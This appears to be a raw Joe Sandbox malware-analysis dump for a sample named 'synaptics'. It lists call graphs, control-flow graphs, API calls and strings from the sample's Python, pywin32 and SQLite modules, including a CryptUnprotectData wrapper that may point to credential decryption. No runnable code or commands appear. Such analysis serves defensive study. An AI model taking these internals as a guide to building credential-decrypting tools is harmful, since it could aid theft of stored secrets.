?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W Py_BuildValue 79074->79075 79076 6bf68471 ?PyWin_SetAPIError@@YAPAU_object@@PADJ 79074->79076 79079 6bf684c5 LocalFree 79075->79079 79080 6bf684c2 LocalFree 79075->79080 79078 6bf684cb ?PyWinObject_FreeWCHAR@@YAXPA_W 79076->79078 79079->79078 79080->79079 79081->79068 79081->79074 79084 6bf65e20 PyErr_Format _PyArg_ParseTuple_SizeT ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK 79081->79084 79082 6bf6841d 79082->79068 79082->79074 79083->79081 79084->79082 79085 6c1695a0 79088 6c168e00 sqlite3_initialize 79085->79088 79089 6c168e33 79088->79089 79109 6c1694bd 79088->79109 79090 6c168eaf memset 79089->79090 79113 6c1694a3 79089->79113 79091 6c168f0c 79090->79091 79092 6c168ec9 79090->79092 79127 6c168620 79091->79127 79093 6c168ee7 79092->79093 79094 6c168ed1 sqlite3_free 79092->79094 79093->79091 79098 6c168ef9 sqlite3_free 79093->79098 79094->79113 79097 6c169003 79099 6c168620 5 API calls 79097->79099 79098->79113 79100 6c16901a 79099->79100 79101 6c168620 5 API calls 79100->79101 79102 6c169031 79101->79102 79103 6c168620 5 API calls 79102->79103 79104 6c169048 79103->79104 79105 6c168620 5 API calls 79104->79105 79106 6c169062 79105->79106 79107 6c169081 79106->79107 79108 6c16908d 79106->79108 79124 6c1690c2 79106->79124 79163 6c169a20 sqlite3_log 79107->79163 79164 6c168820 9 API calls 79108->79164 79112 6c16908b 79112->79124 79134 6c0dc5d0 79112->79134 79113->79109 79167 6c1668d0 43 API calls 79113->79167 79114 6c169177 sqlite3_log sqlite3_log 79114->79109 79116 6c1691d1 79116->79124 79165 6c11c400 memset memset 79116->79165 79118 6c16920b 79166 6c11c400 memset memset 79118->79166 79120 6c169247 79121 6c1692a0 sqlite3_overload_function 79120->79121 79120->79124 79122 6c1692b5 79121->79122 79123 6c1692bc sqlite3_errcode 79121->79123 79122->79123 79123->79124 79126 6c1692cf 79123->79126 79124->79113 79124->79114 79125 6c16948d sqlite3_errcode 79125->79124 79126->79124 79126->79125 79128 6c16863b 79127->79128 79130 6c168672 79127->79130 79129 6c168648 sqlite3_log 79128->79129 79128->79130 79129->79097 79132 6c1686c3 79130->79132 79168 6c11bb00 sqlite3_free memset memset memmove 79130->79168 79132->79097 79133 6c168760 79133->79097 79135 6c0dc613 79134->79135 79136 6c0dc6bd memset 79135->79136 79137 6c0dc75a 79135->79137 79142 6c0dc6e1 79136->79142 79155 6c0dc8aa 79136->79155 79190 6c1bf614 5 API calls ___raise_securityfailure 79137->79190 79139 6c0dc76c 79139->79116 79140 6c0dc9bf memset 79169 6c0d4ef0 79140->79169 79144 6c0dc751 sqlite3_free 79142->79144 79145 6c0dc770 79142->79145 79142->79155 79143 6c0dc9e9 79148 6c0dca15 memset 79143->79148 79157 6c0dca44 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 79143->79157 79144->79137 79146 6c0dc779 memmove 79145->79146 79147 6c0dc7a8 79145->79147 79156 6c0dc789 79146->79156 79152 6c0dc7da sqlite3_free sqlite3_free 79147->79152 79147->79156 79149 6c0dca34 79148->79149 79148->79157 79162 6c0cb850 5 API calls 79149->79162 79151 6c0dce43 79151->79116 79191 6c1bf614 5 API calls ___raise_securityfailure 79152->79191 79154 6c0dc7fd 79154->79116 79155->79140 79155->79157 79156->79155 79160 6c0dc946 sqlite3_free sqlite3_free 79156->79160 79193 6c1bf614 5 API calls ___raise_securityfailure 79157->79193 79192 6c1bf614 5 API calls ___raise_securityfailure 79160->79192 79161 6c0dc991 79161->79116 79162->79157 79163->79112 79164->79112 79165->79118 79166->79120 79167->79109 79168->79133 79173 6c0d4f5d 79169->79173 79177 6c0d507b 79169->79177 79170 6c0d4fa7 79171 6c0d4ff4 memset 79170->79171 79187 6c0d5189 79170->79187 79172 6c0d5044 memmove 79171->79172 79179 6c0d5241 79171->79179 79174 6c0d51f6 79172->79174 79175 6c0d5063 memmove 79172->79175 79173->79170 79176 6c0d4f94 memmove 79173->79176 79173->79187 79178 6c0d51f7 memmove memmove 79174->79178 79175->79178 79176->79170 79177->79170 79177->79187 79224 6c169a50 sqlite3_log 79177->79224 79178->79179 79180 6c0d53ae 79179->79180 79194 6c0cd840 79179->79194 79181 6c0d54a3 sqlite3_free 79180->79181 79188 6c0d54b5 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 79180->79188 79181->79143 79182 6c0d5359 sqlite3_uri_parameter 79184 6c0d5370 79182->79184 79184->79180 79186 6c0d5397 sqlite3_uri_parameter 79184->79186 79185 6c0d52f5 79185->79180 79185->79182 79186->79180 79187->79143 79188->79143 79190->79139 79191->79154 79192->79161 79193->79151 79195 6c0cd880 memset 79194->79195 79207 6c0cd8e1 79195->79207 79198 6c0cde80 79198->79185 79199 6c0cde0f 79230 6c1bf614 5 API calls ___raise_securityfailure 79199->79230 79200 6c0cdbce sqlite3_free 79201 6c0cdc4a 79200->79201 79206 6c0cdbe2 79200->79206 79227 6c1bf614 5 API calls ___raise_securityfailure 79201->79227 79202 6c0cd9d5 sqlite3_uri_parameter 79202->79207 79204 6c0cdc69 79204->79185 79205 6c0cda30 CreateFileW 79205->79207 79206->79201 79209 6c0cdc27 79206->79209 79207->79195 79207->79199 79207->79200 79207->79202 79207->79205 79208 6c0cdb03 sqlite3_log 79207->79208 79210 6c0cdccb sqlite3_free 79207->79210 79211 6c0cdb33 sqlite3_free 79207->79211 79213 6c0cdc6d 79207->79213 79225 6c0cd4b0 15 API calls 79207->79225 79208->79207 79226 6c1bf614 5 API calls ___raise_securityfailure 79209->79226 79215 6c0cdcfa 79210->79215 79211->79207 79217 6c0cdc91 sqlite3_log 79213->79217 79219 6c0cdd89 sqlite3_uri_parameter 79215->79219 79221 6c0cdd9e 79215->79221 79216 6c0cdc46 79216->79185 79228 6c1bf614 5 API calls ___raise_securityfailure 79217->79228 79219->79221 79220 6c0cdcc7 79220->79185 79229 6c1bf614 5 API calls ___raise_securityfailure 79221->79229 79223 6c0cde0b 79223->79185 79224->79170 79225->79207 79226->79216 79227->79204 79228->79220 79229->79223 79230->79198 79231 ca10f2 79232 ca10fe ___scrt_is_nonwritable_in_current_image 79231->79232 79255 ca1410 IsProcessorFeaturePresent ___scrt_uninitialize_crt 79232->79255 79234 ca1105 79235 ca1258 79234->79235 79239 ca112f 79234->79239 79259 ca1710 6 API calls 79235->79259 79237 ca125f exit 79238 ca1265 _exit 79237->79238 79240 ca1133 _initterm_e 79239->79240 79243 ca117c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 79239->79243 79241 ca114e 79240->79241 79242 ca115f _initterm 79240->79242 79242->79243 79244 ca11d0 79243->79244 79247 ca11c8 _register_thread_local_exe_atexit_callback 79243->79247 79256 ca182b memset GetStartupInfoW 79244->79256 79246 ca11d5 _get_wide_winmain_command_line 79257 ca1000 __p___wargv __p___argc Py_Main 79246->79257 79247->79244 79249 ca11ea 79258 ca1864 GetModuleHandleW 79249->79258 79251 ca11f1 79251->79237 79252 ca11f5 79251->79252 79253 ca11f9 _cexit 79252->79253 79254 ca11fe ___scrt_uninitialize_crt 79252->79254 79253->79254 79254->79241 79255->79234 79256->79246 79257->79249 79258->79251 79259->79237 79260 6c0a52a0 79261 6c0a52b1 79260->79261 79262 6c0a52c5 79260->79262 79316 6c0a48e0 PyMem_Malloc memset _Py_Dealloc PyErr_SetString 79261->79316 79264 6c0a540d _PyArg_ParseTuple_SizeT 79262->79264 79267 6c0a52de 79262->79267 79268 6c0a52f4 79262->79268 79265 6c0a5428 PyCallable_Check 79264->79265 79297 6c0a53f7 79264->79297 79271 6c0a5438 PyErr_SetString 79265->79271 79282 6c0a5442 79265->79282 79266 6c0a52bd 79317 6c0a5050 51 API calls 79267->79317 79269 6c0a53b9 79268->79269 79270 6c0a52fd 79268->79270 79269->79264 79276 6c0a53cd PyLong_AsVoidPtr 79269->79276 79270->79264 79274 6c0a5310 _PyArg_ParseTuple_SizeT 79270->79274 79271->79297 79273 6c0a52eb 79277 6c0a535d 79274->79277 79278 6c0a5353 79274->79278 79279 6c0a53eb 79276->79279 79280 6c0a53dd PyErr_Occurred 79276->79280 79318 6c0a4d70 10 API calls 79277->79318 79320 6c0a48e0 PyMem_Malloc memset _Py_Dealloc PyErr_SetString 79279->79320 79280->79279 79280->79297 79282->79271 79285 6c0a545d 79282->79285 79284 6c0a5378 79284->79278 79319 6c0a48e0 PyMem_Malloc memset _Py_Dealloc PyErr_SetString 79284->79319 79299 6c0a8c40 PySequence_Size _PyObject_GC_NewVar 79285->79299 79287 6c0a546b 79287->79297 79321 6c0a48e0 PyMem_Malloc memset _Py_Dealloc PyErr_SetString 79287->79321 79289 6c0a5386 79291 6c0a5484 79292 6c0a548d 79291->79292 79293 6c0a54a4 79291->79293 79294 6c0a5492 _Py_Dealloc 79292->79294 79292->79297 79322 6c0a3f60 14 API calls 79293->79322 79296 6c0a54c6 79296->79297 79298 6c0a54d2 _Py_Dealloc 79296->79298 79300 6c0a8c76 PyObject_GC_Track 79299->79300 79307 6c0a8d4f 79299->79307 79302 6c0a8ce4 79300->79302 79308 6c0a8d27 79300->79308 79303 6c0a8cee GetSystemInfo 79302->79303 79304 6c0a8d01 VirtualAlloc 79302->79304 79303->79304 79304->79308 79305 6c0a8d90 PySequence_GetItem 79305->79307 79305->79308 79306 6c0a8f24 PyErr_SetString 79306->79307 79307->79287 79308->79305 79308->79307 79309 6c0a8e04 79308->79309 79309->79306 79315 6c0a8e1f ffi_prep_cif 79309->79315 79311 6c0a8eef ffi_prep_closure 79312 6c0a8ed7 PyErr_Format 79311->79312 79314 6c0a8f0e 79311->79314 79312->79307 79314->79287 79315->79311 79315->79312 79316->79266 79317->79273 79318->79284 79319->79289 79320->79297 79321->79291 79322->79296 79323 6c0aa930 PyArg_ParseTuple 79324 6c0aaa2f 79323->79324 79325 6c0aa95f PySys_Audit 79323->79325 79325->79324 79326 6c0aa97d PyUnicode_AsWideCharString 79325->79326 79326->79324 79327 6c0aa995 PyEval_SaveThread LoadLibraryExW 79326->79327 79328 6c0aa9db GetLastError PyEval_RestoreThread PyMem_Free 79327->79328 79329 6c0aa9b2 PyEval_RestoreThread PyMem_Free 79327->79329 79331 6c0aaa1a 79328->79331 79332 6c0aa9f9 PyErr_Format 79328->79332 79330 6c0aa9c3 Py_BuildValue 79329->79330 79331->79330 79333 6c0aaa1e PyErr_SetFromWindowsErr 79331->79333 79334 6c0ce7d0 GetSystemInfo sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register 79335 6c0ce832 79334->79335
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000040), ref: 6C13B3D4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID: %!S$%s.%s$%s.%s.%s$'%s' is not a function$..%s$Expression tree is too large (maximum depth %d)$access to view "%s" prohibited$no such table: %s$no tables specified$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                              • API String ID: 2221118986-3486433936
                                                                                                                                                                                                              • Opcode ID: 70aeace310a88084d8457564236138c31558980e8af55dbb0462f171d9eab509
                                                                                                                                                                                                              • Instruction ID: 1579a2d0fb49d995513f656897b7aa66593d0907eca7f286f1dae2fff760796c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70aeace310a88084d8457564236138c31558980e8af55dbb0462f171d9eab509
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13A2CD70608B618FD700CF28C480B5AB7F1BF9531CF145A6DE9998BB91E735E849CB92

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 392 6c168e00-6c168e2d sqlite3_initialize 393 6c169574-6c16957a 392->393 394 6c168e33-6c168e3c 392->394 395 6c168e44-6c168e4a 394->395 396 6c168e3e-6c168e42 394->396 398 6c168e52-6c168e58 395->398 399 6c168e4c-6c168e50 395->399 397 6c168e6f-6c168e75 396->397 402 6c168e77-6c168e7d 397->402 403 6c168e7f-6c168e85 397->403 400 6c168e64-6c168e6b 398->400 401 6c168e5a-6c168e62 398->401 399->397 400->397 401->397 404 6c168e8d-6c168ea9 call 6c0c4e40 402->404 403->404 405 6c168e87 403->405 408 6c168eaf-6c168ec7 memset 404->408 409 6c1694c9 404->409 405->404 410 6c168f0c-6c168f11 408->410 411 6c168ec9-6c168ecf 408->411 412 6c1694cb-6c1694d0 409->412 416 6c168f13-6c168f1a 410->416 417 6c168f1d-6c169068 call 6c168620 * 5 410->417 414 6c168ee7-6c168ef7 411->414 415 6c168ed1-6c168ee2 sqlite3_free 411->415 413 6c1694d6-6c1694df call 6c1668d0 412->413 424 6c1694e1-6c1694e9 413->424 414->410 425 6c168ef9-6c168f07 sqlite3_free 414->425 415->413 416->417 443 6c16906e-6c16907f 417->443 444 6c169149 417->444 427 6c169572 424->427 428 6c1694ef 424->428 425->413 427->393 430 6c1694f0-6c1694f4 428->430 433 6c1694f6-6c1694fa 430->433 434 6c169508-6c169509 430->434 433->434 436 6c1694fc-6c169500 433->436 434->430 436->434 438 6c169502-6c169506 436->438 438->434 440 6c16950b-6c16950e 438->440 440->427 442 6c169510-6c169517 440->442 445 6c169568-6c16956f 442->445 446 6c169519-6c169520 442->446 448 6c169081-6c16908b call 6c169a20 443->448 449 6c16908d-6c1690b2 call 6c168820 443->449 447 6c16914b-6c169150 444->447 445->427 450 6c169522-6c169529 446->450 451 6c16952c-6c169553 446->451 452 6c169152-6c169159 447->452 453 6c16915c-6c169161 447->453 464 6c1690b6-6c1690bc 448->464 449->464 450->451 451->427 473 6c169555-6c169567 451->473 452->453 460 6c169167-6c169169 453->460 461 6c1694a3-6c1694a7 453->461 460->461 465 6c16916f-6c169171 460->465 461->412 466 6c1694a9-6c1694bb 461->466 471 6c1691b7-6c1691cc call 6c0dc5d0 464->471 472 6c1690c2-6c1690c5 464->472 465->461 468 6c169177-6c1691b2 sqlite3_log * 2 465->468 469 6c1694d2 466->469 470 6c1694bd-6c1694c1 466->470 468->424 469->413 470->424 474 6c1694c3-6c1694c7 470->474 479 6c1691d1-6c1691d6 471->479 476 6c1690c7-6c1690c9 call 6c0c5870 472->476 477 6c1690ce-6c1690ef call 6c0c91c0 472->477 474->424 476->477 477->444 486 6c1690f1-6c1690f8 477->486 483 6c1691f3-6c169215 call 6c0da820 call 6c11c400 479->483 484 6c1691d8-6c1691ee call 6c0c9160 479->484 498 6c169227-6c169231 483->498 499 6c169217-6c169222 call 6c11bc10 483->499 484->444 489 6c16913f 486->489 490 6c1690fa-6c169101 486->490 495 6c169146 489->495 492 6c169103-6c16910a 490->492 493 6c16910d-6c169134 490->493 492->493 493->444 508 6c169136-6c16913d 493->508 495->444 502 6c169233-6c169237 498->502 503 6c16923e-6c169278 call 6c11c400 498->503 499->498 502->503 504 6c169239 call 6c0da800 502->504 503->447 510 6c16927e-6c16928c 503->510 504->503 508->495 511 6c16928e-6c169297 call 6c0c90f0 510->511 512 6c169299 510->512 515 6c1692a0-6c1692b3 sqlite3_overload_function 511->515 512->515 517 6c1692b5-6c1692b7 call 6c0c5870 515->517 518 6c1692bc-6c1692cd sqlite3_errcode 515->518 517->518 520 6c1692cf-6c1692da 518->520 521 6c1692fd-6c1692ff call 6c0c9160 518->521 522 6c1692e0-6c1692e8 520->522 524 6c169304-6c169321 call 6c166060 521->524 525 6c1692ea-6c1692fb 522->525 526 6c16935b-6c16936c 522->526 534 6c169323-6c16932d 524->534 535 6c169330-6c169346 524->535 525->521 525->522 528 6c169372-6c169380 526->528 529 6c16948d-6c169498 sqlite3_errcode 526->529 533 6c169383-6c16938a 528->533 529->447 531 6c16949e 529->531 531->524 536 6c169390-6c16939f 533->536 537 6c16938c-6c16938e 533->537 534->535 538 6c169352-6c169356 535->538 539 6c169348-6c16934f 535->539 545 6c1693a1-6c1693a8 536->545 546 6c1693ab 536->546 540 6c1693af-6c1693b5 537->540 538->447 539->538 543 6c1693b7-6c1693c1 540->543 544 6c1693c3-6c1693cb 540->544 547 6c1693cf-6c1693d1 543->547 544->547 545->546 546->540 549 6c1693d3-6c1693da 547->549 550 6c1693dd-6c1693e9 547->550 549->550 552 6c1693eb-6c1693fd 550->552 553 6c169418-6c16941a 550->553 561 6c169414 552->561 562 6c1693ff-6c169412 call 6c0c91c0 552->562 554 6c169474-6c16947f 553->554 555 6c16941c-6c169423 553->555 554->533 558 6c169485-6c169489 554->558 559 6c169425-6c16942c 555->559 560 6c16946a 555->560 558->529 563 6c16942e-6c169435 559->563 564 6c169438-6c16945f 559->564 566 6c169471 560->566 561->553 562->561 563->564 564->554 571 6c169461-6c169468 564->571 566->554 571->566
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_initialize.SQLITE3 ref: 6C168E26
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000218), ref: 6C168EB7
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(00000000), ref: 6C168ED5
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(00000000), ref: 6C168EFA
                                                                                                                                                                                                                • Part of subcall function 6C168820: sqlite3_initialize.SQLITE3(?), ref: 6C1688D3
                                                                                                                                                                                                                • Part of subcall function 6C168820: sqlite3_mprintf.SQLITE3(invalid uri authority: %.*s,-000000F2), ref: 6C16896C
                                                                                                                                                                                                                • Part of subcall function 6C168820: sqlite3_free_filename.SQLITE3(?,no such vfs: %s,?,?,00000000,00000000,?,?,?,?,?,?,6C1690A8,?,00000000,?), ref: 6C168D5E
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(00000015,API call with %s database connection pointer,invalid), ref: 6C169183
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(00000015,%s at line %d of [%.10s],misuse,0002AC30,df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24), ref: 6C1691A1
                                                                                                                                                                                                              • sqlite3_overload_function.SQLITE3(00000000,MATCH,00000002), ref: 6C1692A8
                                                                                                                                                                                                              • sqlite3_errcode.SQLITE3(00000000), ref: 6C1692BD
                                                                                                                                                                                                              • sqlite3_errcode.SQLITE3(00000000), ref: 6C16948E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_errcodesqlite3_freesqlite3_initializesqlite3_log$memsetsqlite3_free_filenamesqlite3_mprintfsqlite3_overload_function
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24$invalid$main$misuse$temp
                                                                                                                                                                                                              • API String ID: 4260298293-3503593000
                                                                                                                                                                                                              • Opcode ID: 927793707726e1f31e7376e63c99641a57c1f57180928726b55cc74b4e16eace
                                                                                                                                                                                                              • Instruction ID: 95dd97e1870a6f89641e2f475154ee3de4885e88674f674778713ae7f2805436
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 927793707726e1f31e7376e63c99641a57c1f57180928726b55cc74b4e16eace
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD22F2B0A057008BE710CF2AC86575AB7F1AF56318F14862EE85A87F81DB74F515CB92

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTupleAndKeywords.PYTHON310(?,?,O|OOOk:CryptUnprotectData,6BF79068,?,00000000,?,?), ref: 6BF6834D
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Reserved must be None), ref: 6BF68372
                                                                                                                                                                                                              • ??0PyWinBufferView@@QAE@PAU_object@@_N1@Z.PYWINTYPES310 ref: 6BF683A6
                                                                                                                                                                                                              • ??1PyWinBufferView@@QAE@XZ.PYWINTYPES310 ref: 6BF683B7
                                                                                                                                                                                                              • ??1PyWinBufferView@@QAE@XZ.PYWINTYPES310 ref: 6BF683D5
                                                                                                                                                                                                              • PyEval_SaveThread.PYTHON310 ref: 6BF68439
                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,?,?,00000000,00000000,?,00000000), ref: 6BF6845B
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6BF68464
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(CryptUnprotectData,00000000,00000000), ref: 6BF68477
                                                                                                                                                                                                              • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES310(?), ref: 6BF684CF
                                                                                                                                                                                                                • Part of subcall function 6BF65DB0: ??0PyWinBufferView@@QAE@PAU_object@@_N1@Z.PYWINTYPES310(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6BF68215), ref: 6BF65DBF
                                                                                                                                                                                                                • Part of subcall function 6BF65DB0: ??1PyWinBufferView@@QAE@XZ.PYWINTYPES310 ref: 6BF65DD2
                                                                                                                                                                                                              • PyBytes_FromStringAndSize.PYTHON310(?,?,00000000), ref: 6BF6848A
                                                                                                                                                                                                              • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z.PYWINTYPES310(?,00000000), ref: 6BF68498
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310(6BF71770,00000000), ref: 6BF684A7
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 6BF684C3
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 6BF684C9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3081095433.000000006BF61000.00000020.00000001.01000000.00000035.sdmp, Offset: 6BF60000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080990738.000000006BF60000.00000002.00000001.01000000.00000035.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081289022.000000006BF70000.00000002.00000001.01000000.00000035.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081481613.000000006BF78000.00000004.00000001.01000000.00000035.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081676759.000000006BF7A000.00000002.00000001.01000000.00000035.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf60000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BufferView@@$Free$Eval_FromLocalObject_StringThreadU_object@@U_object@@_$Arg_BuildBytes_CryptDataErr_Error@@KeywordsParseRestoreSaveSizeTupleUnprotectValueWin_
                                                                                                                                                                                                              • String ID: CryptUnprotectData$O|OOOk:CryptUnprotectData$PXal$Reserved must be None
                                                                                                                                                                                                              • API String ID: 531312383-3274138679
                                                                                                                                                                                                              • Opcode ID: 09b59334a42a3704bd4d404ca2dc514e4f94d98d9796a137381a0f29a6493e24
                                                                                                                                                                                                              • Instruction ID: 13e3cd5162d0469fe27d5b694754b4449f7894f68673199a3b2b157de6405c4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09b59334a42a3704bd4d404ca2dc514e4f94d98d9796a137381a0f29a6493e24
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D5182724183159FCB01CF24D844A5BBBF8FF8A354F00496EF995D2220EBB6D918CB92

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 596 6c0cd840-6c0cd87b 597 6c0cd880-6c0cd8df memset 596->597 598 6c0cd8e1-6c0cd8f0 call 6c0cd4b0 597->598 599 6c0cd902 597->599 604 6c0cd8f6-6c0cd900 598->604 605 6c0cde70-6c0cde83 call 6c1bf614 598->605 600 6c0cd906-6c0cd913 call 6c0cb040 599->600 608 6c0cde0f-6c0cde11 600->608 609 6c0cd919-6c0cd92c 600->609 604->600 610 6c0cde6b 608->610 611 6c0cde13-6c0cde1a 608->611 613 6c0cd930-6c0cd940 609->613 610->605 614 6c0cde1c-6c0cde23 611->614 615 6c0cde61 611->615 620 6c0cd98c-6c0cd993 613->620 621 6c0cd942-6c0cd94e 613->621 616 6c0cde2f-6c0cde56 614->616 617 6c0cde25-6c0cde2c 614->617 619 6c0cde68 615->619 616->610 638 6c0cde58-6c0cde5f 616->638 617->616 619->610 623 6c0cd99d-6c0cd9b8 620->623 624 6c0cd995-6c0cd997 620->624 621->623 634 6c0cd950-6c0cd953 621->634 627 6c0cd9ba-6c0cd9c3 623->627 628 6c0cd9c5-6c0cd9d3 623->628 624->623 626 6c0cdbce-6c0cdbe0 sqlite3_free 624->626 630 6c0cdc54-6c0cdc6c call 6c1bf614 626->630 631 6c0cdbe2-6c0cdbe9 626->631 632 6c0cd9d5-6c0cd9e8 sqlite3_uri_parameter 627->632 628->632 635 6c0cdc4a-6c0cdc51 631->635 636 6c0cdbeb-6c0cdbf2 631->636 639 6c0cd9ea-6c0cda02 call 6c12bac0 632->639 640 6c0cda04 632->640 641 6c0cd975-6c0cd98a 634->641 642 6c0cd955-6c0cd958 634->642 635->630 644 6c0cdbfe-6c0cdc25 636->644 645 6c0cdbf4-6c0cdbfb 636->645 638->619 643 6c0cda06-6c0cda2b 639->643 640->643 641->613 642->641 648 6c0cd95a-6c0cd95d 642->648 650 6c0cda30-6c0cda4a CreateFileW 643->650 644->630 670 6c0cdc27-6c0cdc49 call 6c1bf614 644->670 645->644 648->641 649 6c0cd95f-6c0cd962 648->649 649->641 655 6c0cd964-6c0cd967 649->655 656 6c0cdafb 650->656 657 6c0cda50-6c0cda55 650->657 655->641 660 6c0cd969-6c0cd96c 655->660 663 6c0cdaff-6c0cdb01 656->663 661 6c0cda9e-6c0cdaae 657->661 662 6c0cda57-6c0cda67 657->662 660->641 664 6c0cd96e-6c0cd973 660->664 677 6c0cdaf5-6c0cdaf9 661->677 678 6c0cdab0-6c0cdab3 661->678 665 6c0cda69 662->665 666 6c0cda6b-6c0cda8c call 6c0ce000 662->666 667 6c0cdb2a-6c0cdb2d 663->667 668 6c0cdb03-6c0cdb27 sqlite3_log 663->668 664->623 664->641 665->666 691 6c0cda8e 666->691 692 6c0cda90-6c0cda92 666->692 672 6c0cdccb-6c0cdcd1 667->672 673 6c0cdb33-6c0cdb45 sqlite3_free 667->673 668->667 675 6c0cdcdf-6c0cdcf8 sqlite3_free 672->675 676 6c0cdcd3-6c0cdcdd 672->676 679 6c0cdb9f-6c0cdba4 673->679 680 6c0cdb47-6c0cdb4e 673->680 683 6c0cdd58-6c0cdd5a 675->683 684 6c0cdcfa-6c0cdd01 675->684 676->675 677->663 685 6c0cdad5-6c0cdaf0 678->685 686 6c0cdab5-6c0cdab8 678->686 687 6c0cdc6d-6c0cdcca call 6c0cb690 sqlite3_log call 6c1bf614 679->687 688 6c0cdbaa-6c0cdbaf 679->688 689 6c0cdb95 680->689 690 6c0cdb50-6c0cdb57 680->690 694 6c0cdd5c-6c0cdd5e 683->694 695 6c0cdd60 683->695 696 6c0cdd4e 684->696 697 6c0cdd03-6c0cdd0a 684->697 685->650 686->685 698 6c0cdaba-6c0cdabd 686->698 688->687 699 6c0cdbb5-6c0cdbc9 688->699 708 6c0cdb9c 689->708 700 6c0cdb59-6c0cdb60 690->700 701 6c0cdb63-6c0cdb8a 690->701 691->692 703 6c0cda9a 692->703 704 6c0cda94-6c0cda98 692->704 706 6c0cdd65-6c0cdd7a 694->706 695->706 713 6c0cdd55 696->713 709 6c0cdd0c-6c0cdd13 697->709 710 6c0cdd16-6c0cdd43 697->710 698->685 711 6c0cdabf-6c0cdac2 698->711 699->597 700->701 701->679 732 